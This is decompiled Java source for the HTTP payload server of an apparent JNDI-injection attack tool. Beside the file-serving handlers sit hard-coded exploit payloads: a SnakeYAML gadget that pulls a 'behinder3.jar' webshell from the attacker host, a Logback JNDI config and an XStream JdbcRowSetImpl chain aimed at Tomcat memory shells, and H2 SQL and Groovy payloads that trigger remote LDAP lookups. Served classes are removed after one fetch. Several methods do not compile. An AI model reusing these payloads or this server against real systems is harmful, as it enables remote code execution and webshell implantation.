package com.ar3h.chains.web.jndi;

import com.ar3h.chains.common.Constants;
import com.ar3h.chains.web.jndi.core.Cache;
import com.ar3h.chains.web.jndi.utils.Config;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Executor;
import java.util.concurrent.TimeUnit;
import net.jodah.expiringmap.ExpirationPolicy;
import net.jodah.expiringmap.ExpiringMap;
import org.apache.commons.lang3.reflect.FieldUtils;
import org.apache.velocity.servlet.VelocityServlet;
import org.eclipse.osgi.storage.Storage;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.web.context.support.GroovyWebApplicationContext;
import org.springframework.web.context.support.XmlWebApplicationContext;

/* loaded from: input_file:BOOT-INF/classes/com/ar3h/chains/web/jndi/HTTPServer.class */
public class HTTPServer {
    // Class-wide SLF4J logger used by the listener and every handler below.
    private static final Logger log = LoggerFactory.getLogger((Class<?>) HTTPServer.class);
    // Process working directory captured at class initialisation; the handlers build their
    // on-disk lookup paths relative to it.
    // NOTE(review): public and non-final, so any code in the process can repoint the directory
    // that files are served from.
    public static String cwd = System.getProperty("user.dir");
    // Set to true at the end of start() and back to false in stop(); a plain (non-volatile) static.
    public static boolean running = false;
    // The listener instance; null until start() has created it.
    private static HttpServer httpServer;

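    /**
     * Starts the embedded HTTP listener and installs the single catch-all request handler.
     *
     * <p>Every request is logged (remote address, request URI and, when present, the
     * User-Agent header) and then dispatched on the path suffix: paths ending in
     * {@code .class} go to {@code handleClassRequest}, everything else goes to
     * {@code handleSecureFileRequest}. No other handler in this class is reachable from here.
     *
     * @throws IOException if the listener cannot be created on {@code Config.httpPort}
     */
    public static void start() throws IOException {
        // NOTE(review): only the port is supplied, so the socket binds the wildcard address and is
        // reachable on every interface, while the log line below reports Config.listenIp.
        // Confirm which of the two is intended before exposing this host to a network.
        httpServer = HttpServer.create(new InetSocketAddress(Config.httpPort), 0);
        httpServer.createContext("/", new HttpHandler() { // from class: com.ar3h.chains.web.jndi.HTTPServer.1
            @Override
            public void handle(HttpExchange httpExchange) {
                try {
                    String path = httpExchange.getRequestURI().getPath();
                    // Parameterized logging: same text as before, without eager string building.
                    HTTPServer.log.info("New HTTP Request From {}  {}", httpExchange.getRemoteAddress(), httpExchange.getRequestURI());
                    List<String> userAgent = httpExchange.getRequestHeaders().get("user-agent");
                    if (userAgent != null) {
                        HTTPServer.log.info("Client User-Agent {}", userAgent);
                    }
                    if (path.endsWith(".class")) {
                        HTTPServer.handleClassRequest(httpExchange);
                    } else {
                        HTTPServer.handleSecureFileRequest(httpExchange);
                    }
                } catch (Exception e) {
                    // Route failures through the logger (with stack trace) instead of stderr so
                    // they end up in the same audit trail as the request lines above.
                    HTTPServer.log.error("[HTTP Server] Request handling failed", e);
                } finally {
                    // The handlers close the exchange only on their normal path. A handler that
                    // throws first (for example a request for "/", whose path splits into zero
                    // segments) previously left the connection open. close() only closes streams
                    // that are not already closed, so the extra call is harmless after success.
                    httpExchange.close();
                }
            }
        });
        // A null executor makes the server use its default executor.
        httpServer.setExecutor((Executor) null);
        httpServer.start();
        log.info("[HTTP Server] Listening on {}:{}", Config.listenIp, Integer.valueOf(Config.httpPort));
        running = true;
    }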

    /**
     * Stops the listener without a grace period and replaces the shared HTTP data cache with a
     * fresh, empty map. Does nothing when the listener was never created.
     */
    public static void stop() {
        if (httpServer == null) {
            return;
        }
        // A delay of 0 seconds: do not wait for in-flight exchanges to finish.
        httpServer.stop(0);
        log.info("[HTTP Server] has been stopped.");
        // The cache is discarded by swapping in a new map with the same limits
        // (10000 entries, 168 hours counted from creation of each entry).
        Cache.httpDataMap = ExpiringMap.builder()
                .maxSize(10000)
                .expiration(168L, TimeUnit.HOURS)
                .variableExpiration()
                .expirationPolicy(ExpirationPolicy.CREATED)
                .build();
        log.debug("clean httpDataMap successfully");
        running = false;
    }

    /**
     * Serves the file named by the text after the last "/" of the request path from
     * {@code <cwd>/<Storage.BUNDLE_DATA_DIR>/}, or answers 404 when no such regular file exists.
     *
     * <p>Private, and not called by the dispatcher registered in {@code start()}.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws Exception on any failure while reading the file or writing the response
     */
    private static void handleFileRequest(HttpExchange httpExchange) throws Exception {
        String path = httpExchange.getRequestURI().getPath();
        // Only the part after the last "/" is used, so the name itself cannot contain "/".
        // NOTE(review): there is no check that the resolved file stays inside the data directory.
        File file = new File(cwd + File.separator + Storage.BUNDLE_DATA_DIR + File.separator + path.substring(path.lastIndexOf("/") + 1));
        if (file.exists() && file.isFile()) {
            byte[] bArr = new byte[(int) file.length()];
            // NOTE(review): the stream is never closed, and a single read() is not guaranteed to
            // fill the whole buffer.
            new FileInputStream(file).read(bArr);
            // NOTE(review): the declared length is one byte more than what is written below.
            httpExchange.sendResponseHeaders(200, file.length() + 1);
            httpExchange.getResponseBody().write(bArr);
        } else {
            log.warn("Response Code: 404");
            httpExchange.sendResponseHeaders(404, 0L);
        }
        httpExchange.close();
    }

    /* JADX INFO: Access modifiers changed from: private */
    /**
     * Answers every request whose path does not end in {@code .class} (see the dispatcher in
     * {@code start()}) with bytes looked up by the last "/"-separated segment of the path.
     *
     * <p>The segment is first tried as a regular file under {@code <cwd>/data/http/}; when no such
     * file exists, {@code Cache.get(segment)} is consulted. A non-null byte array is sent with
     * status 200, anything else produces a 404.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws Exception on any failure while reading or responding
     */
    public static void handleSecureFileRequest(HttpExchange httpExchange) throws Exception {
        String[] split = httpExchange.getRequestURI().getPath().split("/");
        // NOTE(review): a path of "/" splits into zero segments, so this index is -1 and throws
        // ArrayIndexOutOfBoundsException before any response is sent.
        String str = split[split.length - 1];
        // The requested name is remote-controlled and is written to the log as received.
        log.info("Request filename: " + str);
        // NOTE(review): no check that the resolved file stays inside data/http.
        File file = new File(cwd + File.separator + "data/http" + File.separator + str);
        byte[] bArr = null;
        if (file.exists() && file.isFile()) {
            // NOTE(review): the file is read into a throwaway array and the stream is never
            // closed; bArr stays null, so an existing on-disk file ends in the 404 branch below.
            new FileInputStream(file).read(new byte[(int) file.length()]);
        } else {
            bArr = Cache.get(str);
        }
        if (bArr != null) {
            // On this path the bytes came from the cache, yet the length argument is taken from
            // the File; File.length() is 0 for a file that does not exist, and a length of 0
            // makes sendResponseHeaders use chunked transfer encoding.
            httpExchange.sendResponseHeaders(200, file.length());
            httpExchange.getResponseBody().write(bArr);
            log.info("Response Code: 200");
            log.info("Response file length: " + bArr.length);
        } else {
            log.warn("Response Code: 404");
            httpExchange.sendResponseHeaders(404, 0L);
        }
        httpExchange.close();
    }

    /**
     * Answers a request for a YAML document selected by the file name (without extension) in the
     * request path.
     *
     * <p>The name {@code snake} (case-insensitive) returns a built-in document made of global type
     * tags that name {@code ScriptEngineManager}, {@code URLClassLoader} and a URL on this server
     * ({@code Config.ip}:{@code Config.httpPort}). A YAML parser that honours such tags on
     * untrusted input will instantiate those types; parsers restricted to plain data types
     * do not. Any other name is looked up as {@code <name>.yml} in the data directory.
     *
     * <p>Private, and not called by the dispatcher registered in {@code start()}.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws IOException on read or write failure
     */
    private static void handleYmlRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        // Throws StringIndexOutOfBoundsException when the path has no "." after the last "/".
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        String str = "!!javax.script.ScriptEngineManager [\n  !!java.net.URLClassLoader [[\n    !!java.net.URL [\"http://" + Config.ip + ":" + Config.httpPort + "/behinder3.jar\"]\n  ]]\n]\n";
        if (substring.equalsIgnoreCase("snake")) {
            log.info("Response Code: 200");
            // NOTE(review): the length is computed with the platform charset and has 1 added,
            // while the body below is UTF-8 and carries no extra byte.
            httpExchange.sendResponseHeaders(200, str.getBytes().length + 1);
            httpExchange.getResponseBody().write(str.getBytes(StandardCharsets.UTF_8));
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + ".yml");
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                // Decompiler rendering of a try-with-resources: th is never reassigned, so every
                // branch guarded by "0 != 0" or "th != null" is dead and the stream is simply closed.
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
                        // NOTE(review): declared length is one byte more than the bytes written.
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                log.warn("Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    /**
     * Answers a request for a text file selected by the file name (without extension) in the
     * request path.
     *
     * <p>The name {@code isok} (case-insensitive) returns the fixed body {@code success!}; any
     * other name is looked up as {@code <name>.txt} in the data directory, with 404 when absent.
     * Not called by the dispatcher registered in {@code start()}.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws IOException on read or write failure
     */
    public static void handleTXTRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        // Throws StringIndexOutOfBoundsException when the path has no "." after the last "/".
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        if (substring.equalsIgnoreCase("isok")) {
            log.info("Response Code: 200");
            byte[] bytes = "success!".getBytes();
            httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
            // NOTE(review): declared length is one byte more than the bytes written.
            httpExchange.sendResponseHeaders(200, bytes.length + 1);
            httpExchange.getResponseBody().write(bytes);
        } else {
            // NOTE(review): no check that the resolved file stays inside the data directory.
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + ".txt");
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                // Decompiler rendering of a try-with-resources: th is never reassigned, so every
                // branch guarded by "0 != 0" or "th != null" is dead and the stream is simply closed.
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
                        // NOTE(review): declared length is one byte more than the bytes written.
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                log.warn("Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    public static void handleXMLRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        String str = "<configuration>\n  <insertFromJNDI env-entry-name=\"ldap://" + Config.ip + ":" + Config.ldapPort + "/TomcatBypass/TomcatMemshell3\" as=\"appName\" />\n</configuration>";
        String str2 = "<linked-hash-set>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"com.sun.rowset.JdbcRowSetImpl\" serialization=\"custom\">\n                      <javax.sql.rowset.BaseRowSet>\n                        <default>\n                          <concurrency>1008</concurrency>\n                          <escapeProcessing>true</escapeProcessing>\n                          <fetchDir>1000</fetchDir>\n                          <fetchSize>0</fetchSize>\n                          <isolation>2</isolation>\n                          <maxFieldSize>0</maxFieldSize>\n                          <maxRows>0</maxRows>\n                          <queryTimeout>0</queryTimeout>\n                          <readOnly>true</readOnly>\n                          <rowSetType>1004</rowSetType>\n                          <showDeleted>false</showDeleted>\n                          <dataSource>ldap://" + Config.ip + ":1389/basic/TomcatMemShell3</dataSource>\n                          <listeners/>\n                          <params/>\n                        </default>\n                      </javax.sql.rowset.BaseRowSet>\n                      <com.sun.rowset.JdbcRowSetImpl>\n                        <default>\n                          <iMatchColumns>\n                            <int>-1</int>\n        
                    <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                          </iMatchColumns>\n                          <strMatchColumns>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                          </strMatchColumns>\n                        </default>\n                      </com.sun.rowset.JdbcRowSetImpl>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>com.sun.rowset.JdbcRowSetImpl</class>\n                      <name>getDatabaseMetaData</name>\n                      <parameter-types/>\n                    </method>\n                    <name>foo</name>\n                  </filter>\n                  <next class=\"string\">foo</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    
</jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</linked-hash-set>";
        if (substring.equals("a")) {
            log.info("Response Code: 200");
            httpExchange.sendResponseHeaders(200, str.getBytes().length + 1);
            httpExchange.getResponseBody().write(str.getBytes(StandardCharsets.UTF_8));
        } else if (substring.equals("x")) {
            log.info("Response Code: 200");
            httpExchange.getResponseHeaders().add("Content-Type", "application/xml; charset=utf-8");
            httpExchange.sendResponseHeaders(200, str2.getBytes().length + 1);
            httpExchange.getResponseBody().write(str2.getBytes(StandardCharsets.UTF_8));
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + XmlWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX);
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().add("Content-Type", "application/xml; charset=utf-8");
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                System.out.println("[!] Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    /**
     * Answers a request for SQL text selected by the file name (without extension) in the
     * request path.
     *
     * <p>The names {@code echo} and {@code inject} (case-insensitive) return built-in
     * {@code CREATE ALIAS ... CALL ...} text whose alias name is the current
     * {@code System.nanoTime()} value; any other name is looked up as {@code <name>.sql} in the
     * data directory. Not called by the dispatcher registered in {@code start()}.
     *
     * <p>As decompiled, this method does not compile: {@code r0} is referenced but never declared.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws IOException on read or write failure
     */
    public static void handleSQLRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        // NOTE(review): taken from the request URI, not from Config; presumably null when the
        // request line carries only a path — confirm.
        String host = httpExchange.getRequestURI().getHost();
        // Throws StringIndexOutOfBoundsException when the path has no "." after the last "/".
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        if (substring.equalsIgnoreCase("echo")) {
            log.info("Response Code: 200");
            String valueOf = String.valueOf(System.nanoTime());
            // r0 is an unresolved decompiler temporary; it presumably held the response text.
            httpExchange.sendResponseHeaders(200, r0.getBytes().length + 1);
            httpExchange.getResponseBody().write(("CREATE ALIAS " + valueOf + " AS CONCAT('void ex()throws Exception{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap://" + host + ":1389/TomcatBypass/TomcatEcho\");',' 'o.setAutoCommit(\"true\");,'}');CALL " + valueOf + "();\"}").getBytes(StandardCharsets.UTF_8));
        } else if (substring.equalsIgnoreCase("inject")) {
            log.info("Response Code: 200");
            String valueOf2 = String.valueOf(System.nanoTime());
            // r0 is an unresolved decompiler temporary; it presumably held the response text.
            httpExchange.sendResponseHeaders(200, r0.getBytes().length + 1);
            httpExchange.getResponseBody().write(("CREATE ALIAS " + valueOf2 + " AS CONCAT('void ex()throws Exception{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap:// + host + :1389/inject.class\");',' 'o.setAutoCommit(\"true\");,'}');CALL " + valueOf2 + "();\"}").getBytes(StandardCharsets.UTF_8));
        } else {
            // NOTE(review): no check that the resolved file stays inside the data directory.
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + ".sql");
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                // Decompiler rendering of a try-with-resources: th is never reassigned, so every
                // branch guarded by "0 != 0" or "th != null" is dead and the stream is simply closed.
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        // NOTE(review): declared length is one byte more than the bytes written.
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                // Unlike the other handlers, the 404 notice goes to stdout rather than the logger.
                System.out.println("[!] Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    /**
     * Answers a request for Groovy source selected by the file name (without extension) in the
     * request path.
     *
     * <p>The name {@code groovyecho} (case-insensitive) returns a built-in class definition; any
     * other name is looked up in the data directory with the suffix
     * {@code GroovyWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX}. Not called by the
     * dispatcher registered in {@code start()}.
     *
     * <p>As decompiled, this method does not compile: {@code r0} is referenced but never declared.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws IOException on read or write failure
     */
    public static void handlerGroovyRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        // NOTE(review): taken from the request URI, not from Config; presumably null when the
        // request line carries only a path — confirm.
        String host = httpExchange.getRequestURI().getHost();
        // Throws StringIndexOutOfBoundsException when the path has no "." after the last "/".
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        if (substring.equalsIgnoreCase("groovyecho")) {
            log.info("Response Code: 200");
            // r0 is an unresolved decompiler temporary; it presumably held the response text.
            httpExchange.sendResponseHeaders(200, r0.getBytes().length + 1);
            httpExchange.getResponseBody().write(("class demo {\n    static void main(){\n        com.sun.rowset.JdbcRowSetImpl o = new com.sun.rowset.JdbcRowSetImpl();\n        o.setDataSourceName(\"ldap://" + host + ":1389/TomcatBypass/TomcatEcho\");\n        o.setAutoCommit(true);\n    }\n}\n").getBytes(StandardCharsets.UTF_8));
        } else {
            // NOTE(review): no check that the resolved file stays inside the data directory.
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + GroovyWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX);
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                // Decompiler rendering of a try-with-resources: th is never reassigned, so every
                // branch guarded by "0 != 0" or "th != null" is dead and the stream is simply closed.
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        // NOTE(review): declared length is one byte more than the bytes written.
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                // Unlike the other handlers, the 404 notice goes to stdout rather than the logger.
                System.out.println("[!] Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    /**
     * Logs the request start line of the given exchange and answers with status 200.
     *
     * <p>The start line is not exposed by {@code HttpExchange}, so it is read reflectively through
     * three nested private fields. Not called by the dispatcher registered in {@code start()}.
     *
     * @param httpExchange the exchange whose request line is logged; closed before returning
     * @throws IllegalAccessException if one of the reflective field reads is refused
     * @throws IOException if the response headers cannot be sent
     */
    public static void handleXXELogRequest(HttpExchange httpExchange) throws IllegalAccessException, IOException {
        // NOTE(review): these field names belong to the HTTP server implementation, not to its
        // public API, so the lookups may break on another JDK build — confirm.
        Object exchangeImpl = FieldUtils.readField((Object) httpExchange, "impl", true);
        Object request = FieldUtils.readField(exchangeImpl, VelocityServlet.REQUEST, true);
        String startLine = (String) FieldUtils.readField(request, "startLine", true);
        // The start line is remote-controlled and is written to the log as received.
        log.info("XXE Attack Result: " + startLine);
        httpExchange.sendResponseHeaders(200, 0L);
        httpExchange.close();
    }

    /**
     * Logs a 404 and sends 404 response headers. Unlike the other handlers in this class, it
     * does not close the exchange.
     *
     * @param httpExchange the exchange to answer
     * @throws IOException if the headers cannot be sent
     */
    private static void handle404(HttpExchange httpExchange) throws IOException {
        final int notFound = 404;
        // A response length of 0 selects chunked transfer encoding rather than "no body".
        final long responseLength = 0L;
        log.warn("Response Code: 404");
        httpExchange.sendResponseHeaders(notFound, responseLength);
    }

    /* JADX INFO: Access modifiers changed from: private */
    /**
     * Answers a request whose path ends in {@code .class} (see the dispatcher in {@code start()})
     * with class bytes looked up by a dotted name derived from the path.
     *
     * <p>The name is the path without its leading "/" and without the final extension, with
     * every remaining "/" turned into ".". It is looked up in {@code Cache} first; on a miss,
     * the file {@code <name>.class} in the data directory is tried, with 404 when absent.
     *
     * <p>Unless {@code Constants.DEBUG} is true, a cache hit removes the entry before the bytes
     * are sent, so the cached bytes are returned for one request only. A later request for the
     * same URL gets the on-disk file or a 404, which matters when trying to re-fetch a class
     * during an investigation: the first response has to come from captured traffic.
     *
     * @param httpExchange the exchange to answer; closed before a normal return
     * @throws IOException on read or write failure
     */
    public static void handleClassRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        // The path is remote-controlled and is written to the log as received.
        log.info("Request ClassRequest Path: " + path);
        // From just after the first "/" up to the last "."; every "/" in between becomes ".".
        String replace = path.substring(path.indexOf("/") + 1, path.lastIndexOf(".")).replace("/", ".");
        if (Cache.contains(replace)) {
            log.info("Response Code: 200");
            byte[] bArr = Cache.get(replace);
            if (!Constants.DEBUG.booleanValue()) {
                // One-shot delivery: the entry is gone after the first hit.
                Cache.remove(replace);
            }
            // NOTE(review): contains() and get() are separate calls on an expiring cache; bArr is
            // dereferenced here without a null check.
            httpExchange.sendResponseHeaders(200, bArr.length);
            httpExchange.getResponseBody().write(bArr);
            log.info("Response Length: " + bArr.length + " bytes");
            log.info("----- Basic Exploit End -----\n");
        } else {
            // "/" was already replaced above, so it cannot appear in the file name.
            // NOTE(review): there is no check that the resolved file stays inside the data directory.
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + replace + ".class");
            if (file.exists()) {
                byte[] bArr2 = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                // Decompiler rendering of a try-with-resources: th is never reassigned, so every
                // branch guarded by "0 != 0" or "th != null" is dead and the stream is simply closed.
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr2);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
                        // NOTE(review): declared length is one byte more than the bytes written,
                        // unlike the cache branch above, which declares the exact length.
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr2);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                log.warn("Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

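    /**
     * Splits a query string of the form {@code k1=v1&k2=v2} into a map.
     *
     * <p>Each pair is split at its first "="; pairs without "=" are skipped. Keys and values are
     * stored exactly as given (no URL decoding), and a repeated key keeps its last value.
     *
     * @param str the query string, may be {@code null}
     * @return a mutable map of the parsed pairs; empty when {@code str} is {@code null} or holds
     *     no pair containing "="
     */
    private static Map<String, String> parseQuery(String str) {
        Map<String, String> params = new HashMap<>();
        // Explicit checks replace the two empty catch blocks that used to absorb the
        // NullPointerException (null input) and ArrayIndexOutOfBoundsException (pair without "=").
        if (str == null) {
            return params;
        }
        // The separator is the literal "&"; the decompiler had rendered it as an unrelated
        // framework constant with the same value.
        for (String pair : str.split("&")) {
            int eq = pair.indexOf('=');
            if (eq < 0) {
                continue;
            }
            params.put(pair.substring(0, eq), pair.substring(eq + 1));
        }
        return params;
    }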
}
